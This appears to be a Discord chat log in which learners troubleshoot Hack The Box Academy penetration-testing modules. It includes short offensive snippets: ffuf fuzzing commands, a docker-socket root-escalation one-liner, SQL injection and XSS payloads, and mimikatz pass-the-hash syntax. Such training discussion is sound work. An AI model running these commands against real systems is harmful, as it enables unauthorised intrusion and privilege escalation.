#modules

ohhhhhhhhhh

you don’t evn have to use FUZZ with ffuf

its customizable

lol

maybe is time for a walk or a rest

Errors : 4984

strange

Maybe its a problem that I use the pwnbox in my personal VM and not the web pwnbox (DDOS protection for certain IP ranges?).
FFUF quickly found the first few sub domains, but then really slowed down, and errors started to appear.

yea i need to go touch grass, been looking at screens all day

plus it looks like this needs a ton of time to run through anyway

Ok thanks, good to know!

@lusty thicket Can you maybe confirm that the command I used should work, or did you use another one?

Thanks for your help! I might have to try it out later with the web pwnbox...

I managed to find the relevant subdomain. For anyone that might be facing similar issues: try limiting the number of threads in use (I used only 1) and also limit the rate (I used 5 requests per second). Then wait for a few long minutes and you should find the subdomain.

Is there a place to report bugs? I got the flag for the repeating requests section but it keeps saying incorrect, I also saw on the forums that other people my have had a similar problem so JW

module? make sure there's no extra space and refresh the page

@Xre0uS its the "Using Web Proxys" module. the more I look through the forum tho there might actually be two different "flag.txt" files so ill keep looking and try refreshing as well. Ill let you know either way

@next bronze Ya no bug, it was like a red herring flag lol Thanks for responding either way!

H M and L stand for high medium and low, right?

yep

I for iron

T is for 'This is the modules channel lets keep it on topic'

on "Pivoting, Tunneling, and Port Forwarding" the part "Web Server Pivoting with Rpivot" im stuck on the last question "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." i have done it but still cant see the web page i even scanned with nmap and its not open etc... any help?

can't run website

How should I write an email to the official or after-sales service? I need to solve some problems.

Try harder? You're using proxychains yeah?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

yeah

Hello, I'm having trouble finding the answer to this question, I'm hours away, I did exactly what was asked in the question, I've already redid it about 6 times, I even restarted the computer, but nothing shows me the name they ask for in the generated json file

this is the question

From Module: SOC Analyst

Section : Windows Event Logs & Finding Evil

part : Tapping Into ETW

Replicate executing Seatbelt and SilkETW as described in this section and provide the ManagedInteropMethodName that starts with "G" and ends with "ion" as your answer. "c:\Tools\SilkETW_SilkService_v8\v8" and "C:\Tools\GhostPack Compiled Binaries" on the spawned target contain everything you need.

I managed to generate the file, where there are some names with this ManagedInteropMethodName tag, but none that start with G, as needed in the answer, I did exactly as shown in the step by step, but nothing gives me the code, I don't know what else to do

Might help if you mention which module and section you're in...

thanks, i edit it

Did you run silketw as admin and made sure to keep it running while you execute seatbelt?

Hi

I'm having a port 22 connection timed out problem on the ssh to one of the boxes in htb...any suggestions would help

I have redownloaded the htb vpn file and also restarted the box a few times

Hello is there a #general where I can discuss about issues?

Offtopic

is it a box or a module?

read #welcome

its a module

Stack-Based Buffer Overflows on Linux x86

Academy

section?

identification of bad characters

the target should be the same across the sections, were you able to ssh into it for the previous sections?

#general
if you have no access, read and follow #welcome

Anyone know why I would get username and password incorrect when trying to RDP into a machine for a lab?

@fierce veldt try putting single quotes around your username and password

I've done that and attempted to use xfreerdp and rdesktop... Verified spelling multiple times too 😢

most certainly just entering it wrong

what module and section is it and screenshot of your attempt to put it in

It's the Active Directory Enumeration & Attacks - Domain Trusts Primer

I can't send screenshots but the command I use is this

rdesktop 10.129.188.199 -u 'htb-student' -p 'Academy_student_AD!'

I'm not getting an ssh timeout but I'm finding the brute forcing really slow. Re: https://academy.hackthebox.com/module/57/section/516

48.00 tries/min, 720 tries in 00:15h, 44880 to do in 15:36h
Following the directions for brute-forcing gave me 15 usernames and 3K passwords to try, so the box will easily run out of time before this is finished.
Is this expected or is this simply how long these things take?

Yes brute forcing took me a very long time. Might be able to shrink the password list and run concurrent brute forcing sessions.

Thank you. I have -t 4 which was advised as the highest concurrent threads SSH can handle without dropping them

you need to verify your account with the instructions in #welcome to post screenshots

reset the target, wait for 5 mins after it spawns, try again

That's helpful, thank you.

@thorn urchin and @next bronze I tried that as well. Even tried using the pwnbox lol

yea I was

idk y i cant rn

Switching it off and on again hasn't really helped, so I've just chosen the first username and it will just take as long as it takes

hm weird, did you reset the target?

lol same command suddenly works. Cool, sorry for the trouble!

some of the AD labs take a while to spin up

it take a while yeah, especially that section with multiple domains

Also I think rdesktop wasn't working because it was defaulting to the wrong domain.

yeah ive tried resetting the target as well :/

try with a target in another module, restart your vm, if all else fails, contact support

ok ill try thank u

You should not need to bruteforce ssh directly, the hint is to see if there is another service running that can be bruteforced faster and has someone reuse their pw with the ssh service

Well the question does say to do that

Finally, try to brute force the SSH server shown above to get the flag.

As you now have the name of an employee from the previous skills assessment question, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.
That's what II'm on. I've got the wordlist and the password list

What is the hint I'm missing? I'm keen for this to not take so long 🙂

would I simply bruteforce the login page? That was the previous exercise

There should be a ftp server running on the same host that is faster to bruteforce

If that’s the section I’m thinking of

I guess if the question wants me to bruteforce something else it should be worded something else other than "bruteforce the SSH server" 😅
Have others had this issue?

(I appreciate the help 🙇 )

It’s a common point of criticism with this module

ah

Some say it teaches you to think outside the box

But the password attacks module has some not-so-userfriendly questions

They come along now and again. I've been searching discord for this wording specifically to see if anyone has had issues. But "slow ssh" was a bit broad haha

I have popped some errata in #858470491676737536

Ssh is notorious for being hard to bruteforce, so you can see this is a lesson of „only try a small wordlist or try something else“

nmap shows 22 and 25 open, not 21 🤔

for sure, I see that 😅

I don't think the skills assessment has a ftp to brute but can't remember

the estimated time is only if it went through all combinations, if it finds a match it won't take nearly as long

There was one where you bruteforced a login page and then pivoted to an FTP server, but that was via localhost.

(I did that one previously)

Thank you so much again @tranquil axle and @next bronze 🙇

So now I've got in 👍 and yes, there was an internal FTP port that I'm now doing another bruteforce on. Much faster (helps to be localhost haha)

take note of which user should be mounting and copying shell

has anyone had any issues with a vm not playing well with the sqli docker instances? It's really strange as I can't seem to get a proper response from them. I have re-downloaded my vpn pack, checked my network settings and it just hangs. But vm instances e.g. windows modules have no issues. It's so strange. Also have no issues using pwnbox at all. This could be an entirely me issue but just curious if anyone else has had anything like this?

Hello, can anyonz help.me withe question submit the password of the sqlftp user from the ntlmrelay module.
I got a password for another user but I dont how to solve thos

section?

The skill assesmznt section

which question

I believe its question number 3

I was able before to get access to backup01 but I'm stuck afterwards

check what you can access with those creds

@next bronze I tried them with crackmapexec and smb and the --shares option but I didn't see anything worth noticing

no readable shares?

I noticed some readable shares on backup01 and sql03 but with other credentials

@next bronze I found BackupShares on Backup01 and SQlShare on SQL03.
Are those the ones?but I don't know where to go from there

Also sqlftp user is not a domain user afaik

check what shares you can access with the credentails you have, one of them should be pretty obvious

@next bronze I found BackupShares and SQlShare on SQL03
I dont know if those are the one you're talking about?

check what's in those

@next bronze I did but I haven't found something noticeable.
On SQL03, I wasn't able to download the zip file.

why not

You are getting ahead of yourself

Take the nudges that Xre0uS pointed at you

@next bronze I used smbmap but evrytime I try to download it I get a corrupted file

Then use something else

You have all of the freedom available and tools to you

hi guys im on ffuf module and i sent out the ffuf -w -u etc tc and it finished fuzzing and its finished but theres no results apart from :: Progress: [81643/81643] :: Job [1/1] :: 197 req/sec :: Duration: [0:05:25] :: Errors: 0 ::

theres no results saying found bla bl

@autumn pilot I tried with smbclient and smbclient.py and I get access denied for the same creds

All I can say is that you have everything that you need to go through that question

@autumn pilot ok, I will retry later, maybe I missed something on the command line or something.
I suck

I was wondering, the target system is pretty slow, I connect to is pretty slow.
Is that the case for youbas well

can anyone help

the section would be helpful

Hello, i am doing the docker part of Linux privilege escalation and i'm trying to run docker but i have this error : ocker: Cannot connect to the Docker daemon at unix://var/run/docker.sock. Is the docker daemon running?

When i try to run docker with systemctl start docker i can't because i need the credentials of user lab_adm. So my question is : do i have to do lateral movment to this user ?

no you don’t

docker start ‘container name’

is the right command

you dont need to do anything

you log in via ssh and you can interact with docker directly

Ok thank you, but i dont get it. I use the command provided in the course because the docker.sock is writable but i have this error again

even if the socker is running

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash this command works for the PE

thank you

it is working

but i don't get it why it wasn't

i used the same command

weird but can happen, try several times is the lesson from this i think

Yeah thank you !

Anyone have any wordlist suggestions for

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

I need to crack a TGS and have tried a couple wordlists with no results 🥲

for htb and do the sub domain fuzzing for .inlanefreight.com

i receive hundreds of replies

is that normal?

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -ic -u https://FUZZ.inlanefreight.com
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -ic -u https://FUZZ.inlanefreight.com

If i'm not wrong, you should be able to crack it with rockyou.txt or if the module provided you a wordlist. If it's not cracking either there is something is wrong with your offline cracking tool configuration or that's not the way to go.

It's normal to get a lot of replies, you need to make use of the filters and matchers option in ffuf to get exactly what you're looking for. Look into those options -fx -mx

x will vary btw.

Trying john now, tried rockyou first thing on hashcat with no results.

you should eliminate any unnecessary replies by using filters, like -fs 7503 for filtering reply size 7503, etc...

I'm not saying it's the wrong tool, john will do the same as hashcat.

check ffuf -h for more info

Maybe the TGS isn't meant to be cracked and you'd have to find some other way. I'll let someone else that remembers this section give you the exact hint. But in the meanwhile, you might want to check at other ways to go if you're not able to crack the TGS hash.

oh i c dank

LOL I missed one character when exporting my hash via copy and paste...

Knew cracking it wasn't supposed to be the challenging part.

with TGSs not much to do apart from cracking ig

well yea apart from importing it to your kerberos session *

hashcat would have been complaining about it if that was the case. Weird it let you run the wordlists

John complained about it which is what let me know I messed up. Pretty weird that hashcat didn’t catch it though I agree…

idk what to filter i filtered 403 and theres stil la ton of answers

nope it's not filtering by response codes, filter by response size, check the section

it dont say anything

o wait nvm

portal is 0 bytes right

im not sure how else

it dont say

i got the answer and looke for response for 0 bytes but idk why it 0

[Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 402ms]
* FUZZ: blog part of the example

-f filters AGAINST the query, -m MATCHES the query btw

so -fs 0 filters out anything that is response size 0 (but you also have to consider 404 response size)

i dont understand the documenting and reporting lab xd

nono i got the ans

they ask you to crack a password from the ntds but that password you got it before if u sniff the network

but idk why the byte size was 0

i did -ms 0

How do I ssh into the Linux machine(https://academy.hackthebox.com/module/143/section/1489) from MS01 on the powershell prompt. The current approach I hav
ssh htb-student@172.16.5.225
e tried isn't working.

is there a reason why customer subdomain is 0 byte

there are multiple paths to get DA, I found 4 irrc

unless ur just meant to copy from the example

copy/paste is dumb sometimes

i c

password isnt working

I tried manually typing the password too. I guess I will try once more

not approach xd

you just need the right user/password

copy/paste into your attack host, then copy/paste it from there to the rdp session

that has worked for me

like i said

it can be dumb

htb-student is not an user of linux machine also you dont need that for that section

no, htb-student is a viable user

the section is the dcsync attack

literally in the first paragraph my guy

can be then

i did everything in that module with ligolo

so i missed that part

this is a good module to practice pivot tools, i agree though

it's just nice to do it as the module intended

yea

in the event that for whatever reason your tools won't work

¯_(ツ)_/¯

Hey guy, Quick logic Q:
creating a fake SPN: "blabla/LEGIT" meaning that creating a fake service (blabla) is available to that specific objet (user) right?

so Y does it helps do to "Kerberoasting attack"?

I could tell you but it would be more beneficial for you to read the materials again, check how a user can request a ST and how SPN plays a part in this

can someone tell me why the vhost ffuf not working on that ffuf module? ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -ic -u http://94.237.56.188:40406 -H 'Host: FUZZ.94.237.56.188:40406'

do U remember what section it is ?

what is ST?

have you read the section/material?

what sectoin do u mean?

Host header needs an actual domain name

i c ok danke

aint no way man, read all the sections relevant to kerberos if you don't know what a st is

service ticket o.O

for the documenting and reporting its awful to do nmap scans wth, i tried locally with ligolo and remotely through the debian RDP

maybe i should add T4

yeah that's what I did

T4 should be good most of the time

or maybe i should use the prepopulated scans

U mean TGS?

yes its the same as ST just an alias

TGS is the service that provides STs

Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS).

over ligolo its still awful i will use the rdp for the scans

Well that was condescending

for parameter fuzzing GET that target ip is the exact ip for the parameter fuzzing?

thax @sly dome

I'm having this exact problem. No combination of the two I found (comma separated, no space, space, etc), or them by themselves seems to be accepted

I've used full URLs, partial, with port, without port etc etc

e.g. http://xyz.academy.htb

Do I need to fuzz the answer to figure out the format it wants? Is this part of it? Lol

how do i add subdomains to vhost on /etc/host for ffuf?

OK I've managed it, it was *.academy.htb format. That hint really needs to be in the question

it should be vhost.academy.htb

yea i found vhosts but i cant access them

i added them to /etc/host

its /etc/hosts

but it dont work

yea thats it

what did you add

did you specify the port in your url?

danke

should remove this, spoilers

do you have notes for the 172.16.5.225? In the documenting lab I got ports open when i ran my nmap but now are closed.

is 172.16.5.225 not your own IP?

it's been a while but from my notes it seems that it's the attack box

yea it is l0l

this was weird

hellooooo

soon™, and wrong channel for this

which one "channel"

#1080884182336675872 , read #welcome if you can't access it

okay

thanks

This mimikatz command should work ...given that I am in that directory where the tool is.(pertaining to second question of this module
https://academy.hackthebox.com/module/143/section/1489

is that mimikatz an exe?

cant find the command injection xD

this lab is driving me mad

i think im just going for the attacking enterprise one

Yes

anybody has found the command injection in "Documentation and Reporting"?

no, it is a folder

There is no mimikatz.exe in your folder

yes don't overthink it, it's super simple

there's another folder named mimikatz, might be in there.

What folder? Because its in the Tools folder

oh I think I see

just cd mimikatz; ls

is it in the nix machine? i cant leverage the LFI to RCE

mimikatz is the foldeer

yep

yeah .127 right? try just ;<command>

yea sometimes its so obvious i fkn miss it

i was like "why is cat in a website"

who the hell use cat to show web contents HHAHA

thx

yep lol, I also overdid it but it's really just that

its so unrealistic

but yea, lets continue

i dont feel like doing a report for this lab, what do you think?

i feel like investing the time in the black box approach for the Attacking Enterprise is better

I think it's up to you, if you feel like your reporting skills are up to scratch then sure

yeah that can be a better option

i feel this lab a bit weird and "small"

ofc its just for a quick documentation and reporting module

i understand it!

yep enterprise networks will be a lot more realistic

i just have a personal workflow for my notetaking and all that

for example i dont use the "writehat" tool in it

lets go then

i will take 24-48h to finish it

after that maybe someone can do QA to my draft

sure but only if you send it to me on confluence

im using SysReptor

joking, I can take a look at it if you want

sure buddy

better if the reviewer has the cPTS

thanks

Hi there, can anyone have some tips for the Skills Assessment, task 1 in INTRO TO ASSEMBLY LANGUAGE ? I found a shellcode by modifying the code
(the same like a lot of people here : 4831c....0f05) but it just give me an access with a red prompt with no flags when i load it to
the target. The code seems good, i think the problem is when i run gdb but i'm lost for the moment.
Thanks a lot

check this #modules message

Thanks, i've already check that, i don't know if the shellcode must be loaded as it is or not. I've tried to inverse the bit but same results. I think i must re-read the entire module to be more comfortable with GDB😫

no need to inverse, run it as it is, your output looks right from the few digits you sent

dm me what you got if you can't figure it out

Ok, i will retry and if i'm stuck i will dm you 🙂 thanks a lot

Hello, module ATTACKING ENTERPRISE NETWORKS and section is Lateral Movement, i have a administrator group but how can i read the flag.txt file on the desktop. I cant dump any hashes about Administrator account, but i am in that group HELP pls !! (Also i cracked the kdbx file but password is incorrect so i cant rdp :/ ) PLS DM ME!

heyy guys

I'm new
well idk a bit about this

@knotty chasm just hit Ctrl U and you will see the code. The answer is right there

I hate to be a pain, but does anyone here offer coaching? I currently work as a bouncer and am looking to transition into CySec, Just finding it hard to find my feet. My Friend said HTB is a good starting place

Currently doing Intro to academy, and while I can make my way through the modules, I feel like I'm stumbling through rather than absorbing knowledge. Or is it designed to be that way and it'll become more clear as I progress?

Hi everyone. I was studying passthehash section of Password Attacks module and I am confused a bit. Can you explain me what is the difference between PassTheHash and OverPassTheHash in terms of mimikatz. In the sections, syntax for both methods is the same. Could you help me please?

you authenticate directly using the hash with pth, with overpass the hash, you use the hash to request a kerberos ticket, and further authentication will be done through kerberos

Theoretically, yes. But is it done automatically by mimikatz? How does mimikatz differentiate between PTH and OPTH if I use the same syntax?

stumbling is how you learn, take notes and you'll get better as it goes on. this channel is open for you to ask for help if you need it

mimikatz should have the /ptt option to inject the ticket in your current session

Fair point

hello! i got stucked at Active Directory Enumeration & Attacks Assessment part 1, i found the another domain user by chance and i need to find the users cleartext pw. Is there any guess what to do now?

question?

So sekurlsa::pth /ntlm: is not overpassthehash, am I right?

from what I know, no

Stuck on "Windows Privilege Escalation Skills Assessment - Part I". Cannot get a revshell. Tried uploading nc.exe and using the commands from www.revshells.com as well as all the PowerShell one liners from there. Any hints?

do you have any hint how should i get the cleartext pw?

Sounds like you may want to dump some secrets 😉

áh leeme try that 😄 thx

was asking for the question you're stuck on but yes that should work

I don't remember this, I'll take a look if no one else helped in a bit

Much appreciated" been banging my head agaist the wall for a while now...

This industry is diverse and complex. Initially, it might overwhelm you like trying to drink from a fire hose, but the key is to take it step by step. Maintain your curiosity and persistence. Continuous learning is a part of this field, and it's impossible to know everything.

oh 😄 i misunderstod that

Solved it. Downloaded a new VPN using Academy 2 instead of 1 and TCP instead of UDP...

oh nice, might just be you got a new target, tcp is always more reliable though

Hi Guys, This is my first and newbie question .... from service scanning module I trying to reply the conclusion questions but I got stuck ti get the "bob" password for smbclient, the tip is the password is weak but I try so many without success, may I use hydra to brute force or is there an easier way ? If someone could put me on the way again... I would be very helpful.

I would assume if they say the password is weak they want you to either use some common default creds or use a tool to brutefoce the creds. I cant remember that far back and dont have notes on it.

hello

hi is there a general discussion chanel?

hello

hello call me

?

wats your name

So sorry, looking again, the password was in the module content

hello

@eternal tiger @rustic sage This is not the #general channel.
This channel is about HTB Academy modules
If you want to access the #general channel, read and follow #welcome

thank you:)

Hey

In the module Shell & Payloads, the live engagement, in the second hint it reveals the username and password of the blog

It's possible to get it without the hint? If yes, how

Section: Linux Priv Esc
Module: Polkit
I transfed the compiled version of CVE-2021-4023 onto target machine with scp. but i get this.....
htb-student@ubuntu:~$ ./poc
./poc: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./poc)

Anyone having issues spawning target VMs today?

i didnt have any problem but today the latency is very high

so today i was doing appointment machine in starting point and it was based on sql injection. the solution was to use admin' # (so to make the rest of the line as a comment in php) but why didnt admin' OR 1=1 -- work?

anyone ._.

I asked earlier some help with the ntlmrelay skills assement.
It turns out the issue I was having was with smbmap only.

in that case if the box has gcc then you should compile the .c file inside the box and should work

inside the box?

pwnbox?

in general you should try couple of payloads, and eventually one of them will work

this question should be asked in #starting-point
anyways its because -- needs a space afterwards to be recognised as a comment, so you'll need to do -- (note the space), or -- -

okay thank you i will try that

meaning you transfer .c file to ssh session , then compile it there

yea im dumb

Desktop

i swear i tried to compile on target machine... but i guess i didnt try it for this module

thank you

anyone having trouble getting targets to spawn?

the Active Directory LDAP module could really use a rework or extra content imo, the length is rather disappointing for a tier 4 module, other tier 3 or even tier 2 modules have more content to learn and arguably better made/organised. it's probably one of the few modules in academy that can be done way quicker than the estimated time. and from the phrasing of this module it's quite clear that its supposed to be done before the other AD modules, which is odd and I doubt many have done that. it's still a decent module but can't be compared to the newer ones, at its current state it shouldn't be a tier 4 module

#858470491676737536

I don't think it can be considered errors? 😅 just my thoughts on it

It’s for feedback as well

fair enough

hello

hi

has anyone completed protein cookies2 challenge

Hi is anyone able to give me a hand with the ad enumeration module privellege access, last part leverage sql admin rights to authenticate to host and read desktop flag

Is this sentence from the intro to metasploit module confusing anybody else or is it just me? "Shikata Ga Nai (SGN) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore. Far from it."

Do I need to create a tunnel to connect through to the local pc?

just use the read file command nothing extra

Can I dm you?

no

Can I advertise my ethical hacking community here?

read #rules

Lol, doesn’t make sense to me tho how can I authenticate to a windows host that doesn’t have python use mssqlclient.py to then authenticate to an internal ip then read a file on that desktop

you can use the linux box that's on 172.16.5.225 :) (you have the creds for it); alternatively - yes you can use pivoting and mssqlclient.py on your system

Can I have some clarification on the "Packet Inception, Dissecting Network Traffic With Wireshark" module task

It states that you need to find the malicious actor in the live environment

however there does not appear to be any data relevant to that search in Wireshark-lab-2.zip

The answer to the first question can totally be found in that .zip

But the rest just leads to some confusing rabbithole

hello there & Happy New Year 2024, I don't wanna spoiler, anyone willing to chat about the Logrotate LPE exercise?

If anyone has done the noSQL injection skills assemnt 2 can you please dm me? || I have a script that allows me to exfil the username though time-based blind injection, but when i do this.password instead of this.username, it no longer works || thank you!

anyone happen to know a HTB box that has a lot of ports open?

still stuck?

You will need to import the module for powerview.ps1 before that command will work. It is in the tools directory of the machine you RDP'd into.

for future learners, you might not be looking for the password, try to exfil somthing else that will help you get in

Hi, any tips for “ (Intro to Assembly Language - Conditional Branching)” ? I managed to avoid the loop but I don't understand which HEX value is expected in the response.

Got this sorted, you do indeed need to connect to the VM via RDP to be able to answer the second question

I take it that there's some script running periodically for you to capture?

Yep, it's on a seemingly dead interface but every now and then like 150 packets spin up

I just did that one yesterday and you have to put a random password in as the front end webpage requires the password field to not be empty

When you turn your PC on after 5 years

why are they doing the -H Content type, isnt it sent automatically without need for it specifiying? @htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

probably to prevent misinterpretation

htb academy first hands-on question has incorrect question/answer..

good start for something i just burned $677 cdn on lol

Can I get some insights about why the exploit in the "Public Exploits" module in the Pentester job path works? There was nothing in the NMAP scan for example that would imply that the web application uses that technology.

Hello, dear people. In the INTRO TO ASSEMBLY LANGUAGE module, I "run" after writing "breakpoint _start" in the gdb debugger tool. But I get <_start+0> values in the results. Example output :
→ 0x401000 <_start+0> movabs rax, 0x21796d6564616341
0x40100a <_start+0> xor rax, 0x21449
0x401010 <_start+0> xor rax, rax

I solved the question but I wonder why this happened. (I found it by guessing because the question asked to find the start + 16 value.)

I'm leaving things purposely vague because I don't want to spoil things for anyone. I'd be happy to go into specifics in DMs or here if its okay.

The webpage mostly implies it

Attackin Enterprise network lab is taking +10 minutes to spawn

is that normal?

CAN ANYONE HELP?

please refrain from using caps

@autumn pilot sorry I didn't pay attention

this can be corrected

you'll just have to specify more details or post in #858470491676737536

where the error is

ok sure

Stuck on the Splunk module, which account had most login attempts in 10 minutes. Tried making 10m timespan bins and sorting by count and account name, any help?

i am working on the web enumeration and exploitation section of attacking enterprise network...and i am trying to change the twenty twenty 404 template but i get this error...is this supposed to happen ?

"Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP."

Tbh I think that question is misleading, it wants to know which accounts have <10m between first and last successful login event and which of those has the most successful logins

Resolved.

NVM....figured out the issue

any tips for how to search for that? I'm struggle bussin

Hello, dear people. In the INTRO TO ASSEMBLY LANGUAGE module, I "run" after writing "breakpoint _start" in the gdb debugger tool. But I get <_start+0> values in the results. Example output :
→ 0x401000 <_start+0> movabs rax, 0x21796d6564616341
0x40100a <_start+0> xor rax, 0x21449
0x401010 <_start+0> xor rax, rax

Anyone else feel like complete idiots when doing some of these exercises, I spent 3 hours on one question and it deflated my ego completely

Ohhhh yeah, but I live for the "aha" moment that comes after lengthy periods of trying different things, and researching

changes 1 parameter in command ohhhhh I'm dumb

I was gonna say "I'm an idiot and forgot the semi-colon again", but thought maybe that was more applicable to the java class I just took

Or mysql

you still need help with this?

I finished the AD section and I am building my own tools folder now before I do the assesments at the end. I have never really had to compile my own stuff so I am a bit lost on that. Anyone have some good resources on this topic?

Just download them from the C:/tools folder

get a windows vm, install visual studio

this works until you need to use something that's not in there

Skill issue then

Its best practice to compile for yourself right?

yes

Yes it is best practice though

if you're really lazy, there's this, but compiling yourself is recommended
https://github.com/Flangvik/SharpCollection

I dont understand what this question is asking. I am specifcally confused by "use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag" I think i went to the right url as stated and see the set-cookie for IP:Port/skills but a bit lost here on why/how the fuzzer is the answer. like what is actually occurring with the fuzzer

That’s what I got😄 and https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

set the fuzz location to the /skills/ part?

to the cookie

ahh so i grabbed the wrong item here then

intercept a request to the skills directory

got it, i think

You need a cookie to hash

so now i would need to highlight that part and do a fuzz again on it

ahhh i think i see

now do i select the full value for cookie or just after "Cookie:"

full cookie value

read the hint

i think im getting there

crap still off

Careful with sharing your progress

?

Could be considered spoilers

sorry, i just need some more help than what is presented in the academy site

Just need to repeat those requests with each cookie

i did but im not getting what i need i dont think

all the items returned have same content length so something im doing is def off

you can try manually inspecting each response

Hello

even though content-length appears to be all the same ?

Please

strange

For the last time: go to police

<@&861185840277487616>

Dude we already told you no

In 2 different channels. Just piss off

3

3 now yeah

ban incoming lol

https://tenor.com/view/spongebob-how-many-times-do-we-need-to-teach-you-old-man-slow-thick-gif-12272188

Sorry bye

i swear that this is setup correctly for the fuzz attack to or else how would i be getting these responses

Go contact police

manually go through each response

what is the fuzz attack?

Google will help you

google is your friend

It’s specifically for insta

just leave, you arent here for any legal reason

fuck off

hi guys I am doing XSS module and when I execute <script>alert(window.origin)</script> on the page nothing shows up?

I heard zucc really like to be fuzzed

strange, each request has the different cookie with fuzzing as it should, but the response all has the same cookie

all?

yupp

We don't wanna listen to a voice memo

Yeah Marcie would rather call with you

@lusty thicket @fathom pendant thank you i got it!!!!

I would rather shove my hand in a blender

ty

ughhhh lol that rush when you finaly get it right lol

np

I heavily dislike personal interaction with people I dont know

hmm

sorry x my absolutely ignorance about this, but how can I find the version of glibc for Shared Object Hijacking exercise under LPE module?

ldd --version

Does anyone know any good notes summary/cheatsheet for CPTS?
I was looking for something like that online to compare to my notes and make sure nothing was missing but couldn't find anything

I don't think there are cpts specific cheatsheets around, but there are a lot of pentesting related ones. it's better to build on what you have

I am. I just find it difficult to structure them in categories that would make sense to easily find what I'm looking for later, so I wanted to see how it's normally done.

I end up getting lost with all my notes when it shold be helpful. I watched a bunch of different videos on using Obsidian etc. and it just doesn't seem to click.

Can I chat with somebody about the (first) skills assesment in the Active Directory Enumeration Module (143)? I set up a pivot from the first machine, back to my attack host (VM with vpn). From that first machine I've got credentials for a user, and can winrm into a new machine, using a both ligolo-ng or chisel as a pivot. However, nothing I try to do to copy binaries from my attack box to the new machine works.. it doesn't seem to be connecting out through either pivot

structure them according to your methodology, I found that the checklists on hacktricks are decent, you can base it on that

I build my obsidian notes kinda like wikipedia, with crosslinks to other relevant sections or more detailed notes for quick acesss. and I use a plugin called quickswitcher++ which lets me search through all headings in my vault, and I can adjust the weightage of different type of headings, so I pretty much have my own search engine in the vault that lets me find any info I want within seconds, kinda necessary cause it has close to a million words total. but that's just personal preference, find a way that works for you

[[SectionName #header |relevance]]

Mind if I DM you? Sounds like I could benefit from your input.

you need to open a port for the internal machines to reach your attack box, if you're using evil-winrm you can use it to upload stuff directly

yeah that's one way to do it

i'll keep the quickswitcher plugin in the back of my mind when i go to revise my notes though

it's really good, basically google for my own notes

i need to go back and condense; ad is really slowing me down tbh just because a lot is overwhelming me

like I absorb the knowledge but it make brain hurt

ungabunga run exploit

check out the ad pentest mindmap if you don't know about it
https://github.com/esidate/pentesting-active-directory

eh it's not really needing a mindmap for it

it's just literally how i absorb information

depending on the type/difficulty it exhausts me quickly

i am an info-sponge

ah I see, I guess the best thing is just do it a lot, it will get a lot more comfortable as it goes on

bc i get the concept and the commands. Just a PITA to absorb LMAO

yep there sure is a lot of shit

but that's also why it slows me down; because I want to know what the command is actually doing

i.e. searching for what rights this user/group sid has over another object

for the commands that aren't obvious what they're doing, I usually add comments to explain in my code blocks

yeah

Oh yeah, forgot about the direct upload.. all good now thanks!

speaking of alternate tools, i wanna give pwncat a try eventually for revshells

apparently it has an enum script that works in much the same way linpeas does

saw John Hammond use it for Shakabrah Offsec Box

oh cool, thought it's just a listener

it's apparently got some neat features idk if it's in a repo for parrot or kali

https://github.com/calebstewart/pwncat

aparrentlly you can just pipx install it

neat

bad idea to skip the linux fundementals module?

its pissing me off

its a 6 hour module and ive been on it for like 2 weeks

what are you struggling with

the entire module is so hard to focus on

and i struggle with focus in general

having issues with the metasploit module myself

the first question is a small ctf on using the eternalromance

the os should be windows 7 but nmap is returning differently

while it is basics. it helps to form a baseline of what you can understand

i wonder if this is an issue with the box

it doesn't have to be windows 7;

it's based off smbv1

The SSRF part of the server side module is one of the most dense, confusing things I've seen in the course

the exploit fails every time

are you sure you're setting up the RHOST/LHOST correctly :)

im using the target ip as RHOST

and im using the ip from ifconfig as LHOST

whis is the vpn addr @ 10.10.yadyada

exploit fails or no session created? there's a difference

no session

wrong lhost ip

im using kali wsl

is this an openvpn issue?

think about what's the ip of the the target

pro tip: assume you're making a mistake first, it's usually not the machines 😄

truly!

i dont know if im using the openvpn correctly tbh

at first it was all errors and now i can ping the box so i assume its working correct

ill fiddle with the lhost

if you can run exploit against the target, your vpn is fine

thats good to hear

im usually into reverse engineering and gamehacking so this cyber element is new to me

don't they have you ssh to a system first on this one? or am i misremembering this section

no

the first one is using metasploit to do the ctf

reverse shell

using eternalromance exploit

what's the rhost?

rhost is the target ip

my lhost is my tun0

btw with msfconsole you can just do set lhost tun0 to have it grab it

instead of fully typing it out

i see

set lhost <interface>

running it now

im getting execution expired error

i swear you could set it, maybe not or a change happened but i've been able to successfully set it by just specifying interface

no, it works

im just getting that error

it is not from using the interface

nope it works just fine

execution expired got nothing to do with setting the lhost tho, that's an error when running the exploit

^

as i just showed: the payload works just fine

weird, im using the default cfg

just changed rhosts and lhost

ill reset the target

¯_(ツ)_/¯

you're using the psexec eternalromance yeah?

(the command one just does RCE, not a shell)

yeah

i reset the target

ill try it rq

you are getting an error which is from the latest metasploit version

what does the error mean?

https://github.com/rapid7/metasploit-framework/issues/18647

is this?

whats a non standard directory?

wdym? context?

a non-standard directory is a directory that's not there by default

i.e. a standard linux directory for users is /home/user/

